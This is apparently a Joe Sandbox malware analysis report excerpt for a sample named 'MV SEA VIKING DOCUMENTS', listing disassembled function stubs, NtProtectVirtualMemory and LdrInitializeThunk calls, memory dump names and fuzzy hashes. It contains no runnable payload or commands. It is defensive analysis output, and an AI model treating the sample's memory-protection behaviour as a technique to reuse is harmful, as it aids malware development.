                                                                                                                                                                                                                                control_flow_graph 106 1671598-16715fc NtProtectVirtualMemory 107 1671604-167160b 106->107 108 16715ff call 16712d1 106->108 109 1671612 107->109 108->107 109->109
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 016715FC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2764494173.0000000001671000.00000040.00000400.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1671000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2706961497-0
                                                                                                                                                                                                                                • Opcode ID: fc1674cc6941efff55b23bd640f53b1173147ff51fe10a9d13cf4edadd2cbf81
                                                                                                                                                                                                                                • Instruction ID: aff41bdb37d7bbb3e61a11a9722b56106410d6a95f310d6dfb713c82543565dc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc1674cc6941efff55b23bd640f53b1173147ff51fe10a9d13cf4edadd2cbf81
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B0171E24C93C566D30686A9580FF2BFFF45D43DACB2942CEAC911A497D35B5442DB30
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 01671575 Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 110 1671575-167160b NtProtectVirtualMemory call 16712d1 115 1671612 110->115 115->115
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 016715FC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2764494173.0000000001671000.00000040.00000400.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1671000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2706961497-0
                                                                                                                                                                                                                                • Opcode ID: ca74ddae958f91d72efb1064280140d442eb631729c6ed3febfba71115f2d3aa
                                                                                                                                                                                                                                • Instruction ID: cd787626a645a08a8c96a4aec82eb52d8c4b04964eeaa2c267f5495df4587f99
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca74ddae958f91d72efb1064280140d442eb631729c6ed3febfba71115f2d3aa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06F0E9F1801701AFF7054E26CC4C74977A5AF153B1F1582889C53574B1E7A8C9818F51
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F212F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 037a6f63f2f60b74c508b412744e64d699d5d242105f5a343f3b74ddfe4b58e2
                                                                                                                                                                                                                                • Instruction ID: 3a3e9113e5f692888800aa8ada7f390de5f30a33b4c348b3c9215d36a01db07b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 037a6f63f2f60b74c508b412744e64d699d5d242105f5a343f3b74ddfe4b58e2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E590022121180442D700A5684D14B4B008647D0303FD2C51AF0154514CC969C8616522
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F212E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: eb59e3de01d5615f716c1b2eb7954d89b6bbddb8ad4506f8d9eee917625f3c62
                                                                                                                                                                                                                                • Instruction ID: 5586cde2f6fa20db4610dd20b698e2bd8306b3028f0ca2ea350cb80c39c479b9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb59e3de01d5615f716c1b2eb7954d89b6bbddb8ad4506f8d9eee917625f3c62
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D290026134100842D600A1584514B4A008687E1301FD2C41AF1064514DC66DCC527127
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F212EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: cd4960969ae0fe3d36f59771c5cc6878435618b0dda6aceb3a3e25960c9ef902
                                                                                                                                                                                                                                • Instruction ID: bb4d22b9c0fb667d0eabf4914ba99e4a5dd4f0747ff67cbe009217cb4b18289c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd4960969ae0fe3d36f59771c5cc6878435618b0dda6aceb3a3e25960c9ef902
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C890023120140802D600A158491474F008647D0302FD2C416F1164515DC679C8517572
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F212ED0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 9eea0c39d4437950926574fb945eb0d193b6c5896325782a447ec0f3dcfd9d14
                                                                                                                                                                                                                                • Instruction ID: b55b89b936c7066af731559656a7131c5e9e662a31501d0f1cb620d920dbd95f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9eea0c39d4437950926574fb945eb0d193b6c5896325782a447ec0f3dcfd9d14
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB900221601004424640B1688944A4A40866BE12117D2C526F0998510DC5ADC8656666
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F212D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: ab7c5dc912df8a5734722175a6dd358d69f40e304ea4834cef11352f7fb20faa
                                                                                                                                                                                                                                • Instruction ID: 0a586a243c28d9ecd9574cf2e7ccc88bb7960ef3211599f2677279ff40e664df
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab7c5dc912df8a5734722175a6dd358d69f40e304ea4834cef11352f7fb20faa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6490023120100813D611A158460474B008A47D0241FD2C817F0424518DD6AAC952B122
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F212DA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 3b912473f77cee5f90a1c0f9f626f9269a470b835ebf37780e7622629bb12d9d
                                                                                                                                                                                                                                • Instruction ID: f3ace9081e70aff836f7dfd7ff49c989c78d879b753456fc32557ff0bbb84be7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b912473f77cee5f90a1c0f9f626f9269a470b835ebf37780e7622629bb12d9d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A90022160100902D601B158450475A008B47D0241FD2C427F1024515ECA79C992B132
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F212DC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 38fdd6f19bdcabe51dccabf7edf5bf2a763ce4174183ecf49240ced4dc87244a
                                                                                                                                                                                                                                • Instruction ID: 7462002c6380d6f3e4954ea688cfaac88908db97221a0a508dc6c6700a1434f5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38fdd6f19bdcabe51dccabf7edf5bf2a763ce4174183ecf49240ced4dc87244a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8590027120100802D640B158450478A008647D0301FD2C416F5064514EC6ADCDD57666
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F212C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 124 1f212c30-1f212c3c LdrInitializeThunk
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 95a5de794ea91b099150d507af50cd93b18bfbcb25b0b1bc5db5f9f352adb1d0
                                                                                                                                                                                                                                • Instruction ID: b8a91d2f696d67dae7e9755700195b20433ed8bed231077df303fce469f2b61f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95a5de794ea91b099150d507af50cd93b18bfbcb25b0b1bc5db5f9f352adb1d0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5690022921300402D680B158550874E008647D1202FD2D81AF0015518CC969C8696322
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F212C50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: dbc46f1200e6057c09da40e60ade311deacb2583fd9a344f0705b1f7bc3fb708
                                                                                                                                                                                                                                • Instruction ID: edac0950a42e8d5290d8caffc0095563b7a91011a8b17aa3eea7d6ef21910c55
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbc46f1200e6057c09da40e60ade311deacb2583fd9a344f0705b1f7bc3fb708
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE90022130100403D640B158551874A408697E1301FD2D416F0414514CD969C8566223
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F212CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: e5b1f53c8f52da287ef060b830b619ff0af15382fa5e03c8d5024bebc3b8e534
                                                                                                                                                                                                                                • Instruction ID: e24f5647d549da56848210b245ba6c2b4953aee91c40afd0960979e8ad0ca901
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5b1f53c8f52da287ef060b830b619ff0af15382fa5e03c8d5024bebc3b8e534
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE900221242045525A45F158450464B408757E02417D2C417F1414910CC57AD856E622
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F212B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 121 1f212b10-1f212b1c LdrInitializeThunk
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: ed6b8e6fe0012c32e2e4088420accc51ef7349e7f8a25c0ea576620486418b98
                                                                                                                                                                                                                                • Instruction ID: 91c32770aec16b2ffbfeb544ba22a4821c239424ed5d1543d4de9ff60b0bf16e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed6b8e6fe0012c32e2e4088420accc51ef7349e7f8a25c0ea576620486418b98
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E190023120100C02D680B158450478E008647D1301FD2C41AF0025614DCA69CA5977A2
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F212B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 122 1f212b90-1f212b9c LdrInitializeThunk
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 435df2b9b93f0672876b9a54c22f484fe1dea57e9bf8829d2813c2e6c2be4c71
                                                                                                                                                                                                                                • Instruction ID: 25fbba6f2dc6d78312c8daf3f7ad4e2eeb6851d481dd37045ed8e853821240bc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 435df2b9b93f0672876b9a54c22f484fe1dea57e9bf8829d2813c2e6c2be4c71
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C90023120108C02D610A158850478E008647D0301FD6C816F4424618DC6E9C8917122
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F212BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 123 1f212bc0-1f212bcc LdrInitializeThunk
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 69f28779ac645612a3a6cd521356d48a79d0089ba6f14ad383803994b072e85a
                                                                                                                                                                                                                                • Instruction ID: f8dab6c406b2e6a2c3072a24a42952dd1f31afe528505f0b0f0f8f340f0115ff
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69f28779ac645612a3a6cd521356d48a79d0089ba6f14ad383803994b072e85a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F790023120100802D600A598550878A008647E0301FD2D416F5024515EC6B9C8917132
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F2129F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 120 1f2129f0-1f2129fc LdrInitializeThunk
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: f8abe3727bb4290ce0e7676dd52572e3182efb648f7d7869a06627ad55baaf62
                                                                                                                                                                                                                                • Instruction ID: 4b994510b6724b6c70bac9f5061694d782f53a515916ec9a5e3b7ca41b0790ce
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8abe3727bb4290ce0e7676dd52572e3182efb648f7d7869a06627ad55baaf62
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91900225211004030605E558070464B00C747D53513D2C426F1015510CD675C8616122
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F2134E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F1A0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795197413.000000001F2C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_1f1a0000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 6bd0546a19c3625d4ad637a29d88df605962c6a232720e5008b6476b778c1af3
                                                                                                                                                                                                                                • Instruction ID: 71edd8bb02959cf697f647b501e604920822013cb53888610019a7f0ef6d9f63
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6bd0546a19c3625d4ad637a29d88df605962c6a232720e5008b6476b778c1af3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5690023160510802D600A158461474A108647D0201FE2C816F0424528DC7E9C95175A3
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 01671001 Relevance: 1.6, APIs: 1, Instructions: 108threadCOMMON
                                                                                                                                                                                                                                Download Yara Rule

